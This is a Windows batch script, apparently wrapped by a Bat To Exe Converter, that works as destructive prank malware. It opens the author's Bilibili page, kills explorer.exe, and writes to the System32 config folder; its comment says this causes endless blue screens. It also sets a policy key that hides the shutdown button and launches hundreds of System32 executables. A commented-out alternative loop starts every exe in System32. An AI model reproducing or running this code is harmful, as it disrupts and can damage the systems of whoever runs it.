::[Bat To Exe Converter]
::
::YAwzoRdxOk+EWAjk
::fBw5plQjdCyDJGyX8VAjFDpQQQ2MNXiuFLQI5/rH3+OEtlgPUfEDS4zJ37GAM+gc/lbYc5c733lVloUFDxQ4
::YAwzuBVtJxjWCl3EqQJgSA==
::ZR4luwNxJguZRRnk
::Yhs/ulQjdF+5
::cxAkpRVqdFKZSzk=
::cBs/ulQjdF+5
::ZR41oxFsdFKZSTk=
::eBoioBt6dFKZSDk=
::cRo6pxp7LAbNWATEpSI=
::egkzugNsPRvcWATEpSI=
::dAsiuh18IRvcCxnZtBNQ
::cRYluBh/LU+EWAjk
::YxY4rhs+aU+IeA==
::cxY6rQJ7JhzQF1fEqQJheU8BHVDi
::ZQ05rAF9IBncCkqN+0xwdVsFFVXbZDrqZg==
::ZQ05rAF9IAHYFVzEqQIIG5yjqYJNziv3Rj3TP20QMG97asjTqmbiiwknADF+72X5IiU=
::eg0/rx1wNQPfEVWB+kM9LVsJDDyxu5xfgHruqKW7ZyVQJ6bC0R73/UElXml9phzJb7Ur8Hzltg==
::fBEirQZwNQPfEVWB+kM9LVsJDDyxu5xfgHruqKW7ZyVQJ6bC0R73/UElXml9phzJb7Ur8Hzltg==
::cRolqwZ3JBvQF1fEqQIIG5yjqYJNziv3Rj3TP20QMG97asjTqmbiiwknADF+72X5IiU=
::dhA7uBVwLU+EWGG3c7XVrtSmDEnCtKRtg17DbRQzaiR5JpDu0h7l/X8UX15GQA==
::YQ03rBFzNR3SWATEzHG33/7Sg/bCcSsyyWKZAzd+EyICbLOZiRG5hFVeKnsLyihz
::dhAmsQZ3MwfNWATEzHG33/7Sg/bCcSsyyWKZAzd+EyICbLOZiRG5hFVeKnsLyihz
::ZQ0/vhVqMQ3MEVWAtB9wSA==
::Zg8zqx1/OA3MEVWAtB9wSA==
::dhA7pRFwIByZRRm8x8XHzZ2bvkTPfON10TD3N20HJ29JXMnAp2TDogorFTFk6IA=
::Zh4grVQjdCuDJFuF4H4IG5yjqYJNziv3Rj3TP20QMG97asjTqmbiiwknADF+72X5IgvhbZNN
::YB416Ek+ZW8=
::
::
::978f952a14a936cc963da21a135fa983
@echo off
::关闭代码显示
start https://space.bilibili.com/3493276898298079?spm_id_from=..0.0
::作者界�?
taskkill /f /im explorer.exe
::结束explorer
>>C:\Windows\System32\config\OSdata 1145141919810https://space.bilibili.com/3493276898298079?spm_id_from=..0.0
::电脑无限蓝屏(可能在部分系统失�?
reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\Explorer" /v HideShutDown /t REG_DWORD /d 1 /f
::隐藏关机�?start agentactivationruntimestarter.exe
AgentService.exe
AggregatorHost.exe
aitstatic.exe
alg.exe
AppHostRegistrationVerifier.exe
appidcertstorecheck.exe
appidpolicyconverter.exe
appidtel.exe
AppInstallerBackgroundUpdate.exe
ApplicationFrameHost.exe
ApplySettingsTemplateCatalog.exe
ApplyTrustOffline.exe
ApproveChildRequest.exe
AppVClient.exe
AppVDllSurrogate.exe
appverif.exe
AppVNice.exe
AppVShNotify.exe
ARP.EXE
AssignedAccessGuard.exe
at.exe
AtBroker.exe
attrib.exe
audiodg.exe
auditpol.exe
AuthHost.exe
autochk.exe
autofstx.exe
AxInstUI.exe
backgroundTaskHost.exe
BackgroundTransferHost.exe
bcdboot.exe
bcdedit.exe
bdechangepin.exe
BdeHdCfg.exe
BdeUISrv.exe
bdeunlock.exe
BioIso.exe
BitLockerDeviceEncryption.exe
BitLockerWizard.exe
BitLockerWizardElev.exe
bitsadmin.exe
bootim.exe
bootsect.exe
bridgeunattend.exe
browserexport.exe
browser_broker.exe
bthudtask.exe
ByteCodeGenerator.exe
cacls.exe
calc.exe
CameraSettingsUIHost.exe
CastSrv.exe
CCG.exe
CertEnrollCtrl.exe
certreq.exe
certutil.exe
CExecSvc.exe
change.exe
changepk.exe
charmap.exe
CheckNetIsolation.exe
start chglogon.exe
chgport.exe
start chgusr.exe
chkdsk.exe
chkntfs.exe
choice.exe
CIDiag.exe
cipher.exe
CiTool.exe
cleanmgr.exe
cliconfg.exe
clip.exe
ClipDLS.exe
ClipRenew.exe
ClipUp.exe
CloudExperienceHostBroker.exe
CloudNotifications.exe
start cmd.exe
cmdiag.exe
cmdkey.exe
cmdl32.exe
cmimageworker.exe
cmmon32.exe
cmproxyd.exe
cmstp.exe
cofire.exe
colorcpl.exe
comp.exe
compact.exe
CompatTelRunner.exe
CompMgmtLauncher.exe
CompPkgSrv.exe
ComputerDefaults.exe
conhost.exe
consent.exe
control.exe
convert.exe
convertvhd.exe
coredpussvr.exe
CredentialEnrollmentManager.exe
CredentialUIBroker.exe
credwiz.exe
cscript.exe
csrss.exe
ctfmon.exe
cttune.exe
cttunesvr.exe
curl.exe
CustomInstallExec.exe
CustomShellHost.exe
dasHost.exe
DataExchangeHost.exe
DataStoreCacheDumpTool.exe
dccw.exe
dcomcnfg.exe
ddodiag.exe
Defrag.exe
deploymentcsphelper.exe
DeployUtil.exe
desktopimgdownldr.exe
DeveloperToolsSvc.exe
start DeviceCensus.exe
DeviceCredentialDeployment.exe
DeviceEject.exe
DeviceEnroller.exe
DevicePairingWizard.exe
DeviceProperties.exe
DevToolsLauncher.exe
DFDWiz.exe
dfrgui.exe
dialer.exe
directxdatabaseupdater.exe
diskpart.exe
diskperf.exe
diskraid.exe
DiskSnapshot.exe
diskusage.exe
Dism.exe
dispdiag.exe
DisplaySwitch.exe
djoin.exe
dllhost.exe
dllhst3g.exe
dmcertinst.exe
dmcfghost.exe
dmclient.exe
DmNotificationBroker.exe
DmOmaCpMo.exe
dnscacheugc.exe
doskey.exe
dpapimig.exe
DpiScaling.exe
dpnsvr.exe
driverquery.exe
drvinst.exe
DsmUserTask.exe
dsregcmd.exe
dstokenclean.exe
dtdump.exe
dusmtask.exe
dvdplay.exe
dwm.exe
DWWIN.EXE
dxdiag.exe
dxgiadaptercache.exe
Dxpserver.exe
Eap3Host.exe
EaseOfAccessDialog.exe
easinvoker.exe
EASPolicyManagerBrokerHost.exe
EDPCleanup.exe
edpnotify.exe
EduPrintProv.exe
efsui.exe
EhStorAuthn.exe
EoAExperiences.exe
esentutl.exe
esimtool.exe
eudcedit.exe
eventcreate.exe
eventvwr.exe
expand.exe
extrac32.exe
fc.exe
fclip.exe
fhmanagew.exe
FileDialogBroker.exe
FileHistory.exe
find.exe
findstr.exe
finger.exe
fixmapi.exe
fltMC.exe
FMAPP.exe
FMService64.exe
fodhelper.exe
Fondue.exe
fontdrvhost.exe
fontview.exe
forfiles.exe
fsavailux.exe
FsIso.exe
fsquirt.exe
fsutil.exe
ftp.exe
fvenotify.exe
fveprompt.exe
GameBarPresenceWriter.exe
GameInputSvc.exe
GamePanel.exe
GenValObj.exe
getmac.exe
gpresult.exe
gpscript.exe
gpupdate.exe
grpconv.exe
hcsdiag.exe
hdwwiz.exe
help.exe
hnsdiag.exe
HOSTNAME.EXE
hvax64.exe
hvix64.exe
hvsievaluator.exe
hvsiproxyapp.exe
HvsiSettingsWorker.exe
iaStorAfsNative.exe
iaStorAfsService.exe
icacls.exe
icsunattend.exe
ie4uinit.exe
ie4ushowIE.exe
IESettingSync.exe
ieUnatt.exe
iexpress.exe
immersivetpmvscmgrsvr.exe
InfDefaultInstall.exe
InputSwitchToastHandler.exe
iotstartup.exe
ipconfig.exe
iscsicli.exe
iscsicpl.exe
ISM.exe
isoburn.exe
klist.exe
ksetup.exe
ktmutil.exe
la57setup.exe
label.exe
LanguageComponentsInstallerComHandler.exe
LaunchTM.exe
LaunchWinApp.exe
LegacyNetUXHost.exe
LicenseManagerShellext.exe
licensingdiag.exe
LicensingUI.exe
LiveCaptions.exe
Locator.exe
LockAppHost.exe
LockScreenContentServer.exe
lodctr.exe
logagent.exe
logman.exe
logoff.exe
LogonUI.exe
lpkinstall.exe
lpksetup.exe
lpremove.exe
LsaIso.exe
lsass.exe
Magnify.exe
makecab.exe
manage-bde.exe
ManagedWindowsVM.exe
mavinject.exe
mblctr.exe
MBR2GPT.EXE
mcbuilder.exe
MDEServer.exe
MDMAgent.exe
MDMAppInstaller.exe
MdmDiagnosticsTool.exe
MdRes.exe
MdSched.exe
mfpmp.exe
Microsoft.Uev.CscUnpinTool.exe
Microsoft.Uev.SyncController.exe
microsoft.windows.softwarelogo.showdesktop.exe
MicrosoftEdgeBCHost.exe
MicrosoftEdgeCP.exe
MicrosoftEdgeDevTools.exe
MicrosoftEdgeSH.exe
MicrosoftWebDriver.exe
MLEngineStub.exe
mmc.exe
mmgaserver.exe
mobsync.exe
MoNotificationUxStub.exe
mountvol.exe
mpnotify.exe
MpSigStub.exe
MptfGenericService.exe
MRINFO.EXE
MSchedExe.exe
msconfig.exe
msdt.exe
msdtc.exe
msfeedssync.exe
msg.exe
mshta.exe
msiexec.exe
msinfo32.exe
msra.exe
MsSpellCheckingHost.exe
mstsc.exe
mtstocom.exe
MuiUnattend.exe
MultiDigiMon.exe
nbtstat.exe
ndadmin.exe
NDKPerfCmd.exe
NDKPing.exe
net.exe
net1.exe
netbtugc.exe
netcfg.exe
NetCfgNotifyObjectHost.exe
NetEvtFwdr.exe
NetHost.exe
netiougc.exe
Netplwiz.exe
netsh.exe
NETSTAT.EXE
newdev.exe
NgcIso.exe
nltest.exe
nmbind.exe
nmscrub.exe
notepad.exe
nslookup.exe
ntkrla57.exe
ntoskrnl.exe
ntprint.exe
nvspinfo.exe
odbcad32.exe
odbcconf.exe
ofdeploy.exe
omadmclient.exe
omadmprc.exe
OneDriveSetup.exe
OOBEFodSetup.exe
OobeShellHost.exe
openfiles.exe
OpenWith.exe
OptionalFeatures.exe
osk.exe
pacjsworker.exe
PackagedCWALauncher.exe
PackageInspector.exe
pairtool.exe
PasswordOnWakeSettingFlyout.exe
PATHPING.EXE
pcalua.exe
pcaui.exe
pcwrun.exe
perfmon.exe
phoneactivate.exe
PickerHost.exe
PinEnrollmentBroker.exe
PING.EXE
PkgMgr.exe
PktMon.exe
plasrv.exe
PnPUnattend.exe
pnputil.exe
poqexec.exe
powercfg.exe
PresentationHost.exe
PresentationSettings.exe
prevhost.exe
print.exe
PrintBrmUi.exe
printfilterpipelinesvc.exe
PrintIsolationHost.exe
printui.exe
proquota.exe
provlaunch.exe
provtool.exe
ProximityUxHost.exe
prproc.exe
psr.exe
pwlauncher.exe
qappsrv.exe
qprocess.exe
query.exe
quser.exe
qwinsta.exe
rasautou.exe
rasdial.exe
raserver.exe
rasphone.exe
rdpclip.exe
rdpinit.exe
rdpinput.exe
RdpSa.exe
RdpSaProxy.exe
RdpSaUacHelper.exe
rdpshell.exe
rdpsign.exe
rdrleakdiag.exe
readCloudDataSettings.exe
ReAgentc.exe
recdisc.exe
recover.exe
RecoveryDrive.exe
ReFsDedupSvc.exe
refsutil.exe
reg.exe
regedt32.exe
regini.exe
Register-CimProvider.exe
regsvr32.exe
rekeywiz.exe
relog.exe
RelPost.exe
RemoteAppLifetimeManager.exe
RemotePosWorker.exe
repair-bde.exe
replace.exe
reset.exe
ResetEngine.exe
resmon.exe
RMActivate.exe
RMActivate_isv.exe
RMActivate_ssp.exe
RMActivate_ssp_isv.exe
RmClient.exe
rmttpmvscmgrsvr.exe
Robocopy.exe
ROUTE.EXE
RpcPing.exe
rrinstaller.exe
rstrui.exe
RtkAudUService64.exe
runas.exe
rundll32.exe
runexehelper.exe
RunLegacyCPLElevated.exe
runonce.exe
RuntimeBroker.exe
rwinsta.exe
sc.exe
schtasks.exe
ScriptRunner.exe
sdbinst.exe
sdchange.exe
sdclt.exe
sdiagnhost.exe
SearchFilterHost.exe
SearchIndexer.exe
SearchProtocolHost.exe
SecEdit.exe
secinit.exe
securekernel.exe
securekernella57.exe
SecurityHealthHost.exe
SecurityHealthService.exe
SecurityHealthSystray.exe
SensorDataService.exe
SensorRuntimeBroker.exe
services.exe
sessionmsg.exe
sethc.exe
setspn.exe
setupcl.exe
setupugc.exe
setx.exe
sfc.exe
ShellAppRuntime.exe
ShellHost.exe
shrpubw.exe
shutdown.exe
sigverif.exe
SIHClient.exe
sihost.exe
SlideToShutDown.exe
slui.exe
smartscreen.exe
smartscreenx.exe
smss.exe
SndVol.exe
snmptrap.exe
sort.exe
SpaceAgent.exe
spaceman.exe
spaceutil.exe
SpatialAudioLicenseSrv.exe
spoolsv.exe
spoolsvworker.exe
SppExtComObj.Exe
sppsvc.exe
srdelayed.exe
SrTasks.exe
stordiag.exe
subst.exe
sudo.exe
svchost.exe
sxstrace.exe
SyncAppvPublishingServer.exe
SyncHost.exe
SynTPEnh.exe
SynTPEnhService.exe
SysResetErr.exe
systeminfo.exe
SystemPropertiesAdvanced.exe
SystemPropertiesComputerName.exe
SystemPropertiesDataExecutionPrevention.exe
SystemPropertiesHardware.exe
SystemPropertiesPerformance.exe
SystemPropertiesProtection.exe
SystemPropertiesRemote.exe
SystemSettingsAdminFlows.exe
SystemSettingsBroker.exe
SystemSettingsRemoveDevice.exe
SystemUWPLauncher.exe
systray.exe
tabcal.exe
takeown.exe
TapiUnattend.exe
tar.exe
taskhostw.exe
taskkill.exe
tasklist.exe
Taskmgr.exe
tcblaunch.exe
tcmsetup.exe
TCPSVCS.EXE
ThumbnailExtractionHost.exe
TieringEngineService.exe
timeout.exe
TokenBrokerCookies.exe
TpmInit.exe
TpmTool.exe
tpmvscmgr.exe
tpmvscmgrsvr.exe
tracerpt.exe
TRACERT.EXE
tscon.exe
tsdiscon.exe
tskill.exe
TSTheme.exe
TSWbPrxy.exe
ttdinject.exe
tttracer.exe
typeperf.exe
tzsync.exe
tzutil.exe
UCConfigTask.exe
UCPDMgr.exe
ucsvc.exe
UevAgentPolicyGenerator.exe
UevAppMonitor.exe
UevTemplateBaselineGenerator.exe
UevTemplateConfigItemGenerator.exe
UIEOrchestrator.exe
UIMgrBroker.exe
unlodctr.exe
unregmp2.exe
upfc.exe
UpgradeResultsUI.exe
upnpcont.exe
UPPrinterInstaller.exe
UserAccountBroker.exe
UserAccountControlSettings.exe
UserDataSource.exe
userinit.exe
UsoClient.exe
UtcDecoderHost.exe
Utilman.exe
VaultCmd.exe
vds.exe
vdsldr.exe
verclsid.exe
verifier.exe
verifiergui.exe
vfpctrl.exe
vmcompute.exe
VmComputeAgent.exe
vmwp.exe
VoiceAccess.exe
vsjitdebugger.exe
vssadmin.exe
VSSVC.exe
vulkaninfo-1-999-0-0-0.exe
vulkaninfo.exe
w32tm.exe
waitfor.exe
WallpaperHost.exe
wbadmin.exe
wbengine.exe
wcsetupagent.exe
WDAGNetDiag.exe
WebManagement.exe
wecutil.exe
WerFault.exe
WerFaultSecure.exe
wermgr.exe
wevtutil.exe
wextract.exe
where.exe
whoami.exe
wiaacmgr.exe
wiawow64.exe
wifitask.exe
wimserv.exe
WinBioDataModelOOBE.exe
Windows.Media.BackgroundPlayback.exe
Windows.WARP.JITService.exe
WindowsActionDialog.exe
WindowsSandbox.exe
WindowsSandboxClient.exe
WindowsUpdateElevatedInstaller.exe
wininit.exe
winload.exe
winlogon.exe
winresume.exe
winrs.exe
winrshost.exe
WinRTNetMUAHostServer.exe
WinSAT.exe
winver.exe
wkspbroker.exe
wksprt.exe
wlanext.exe
wlrmdr.exe
WMPDMC.exe
WorkFolders.exe
wowreg32.exe
WpcMon.exe
WpcTok.exe
WPDShextAutoplay.exe
wpnpinst.exe
wpr.exe
start wscadminui.exe
WSCollect.exe
wscript.exe
wsl.exe
WSManHTTPConfig.exe
wsmprovhost.exe
wsqmcons.exe
WSReset.exe
wuapihost.exe
wuauclt.exe
WUDFCompanionHost.exe
WUDFHost.exe
wusa.exe
WWAHost.exe
XblGameSaveTask.exe
xcopy.exe
xwizard.exe
::启动 System32 中的所有EXE文件(参考https://www.bilibili.com/video/BV16nZSYREFN/?vd_source=4b31802b8f5d27ffd77e1975ca83f2c2)
::for %%a in (%windir%\system32\*.exe) do (
::  if /i not "%%~na"=="logoff" start %%~fa
::)
::pause
::b方案(可能在部分系统失�?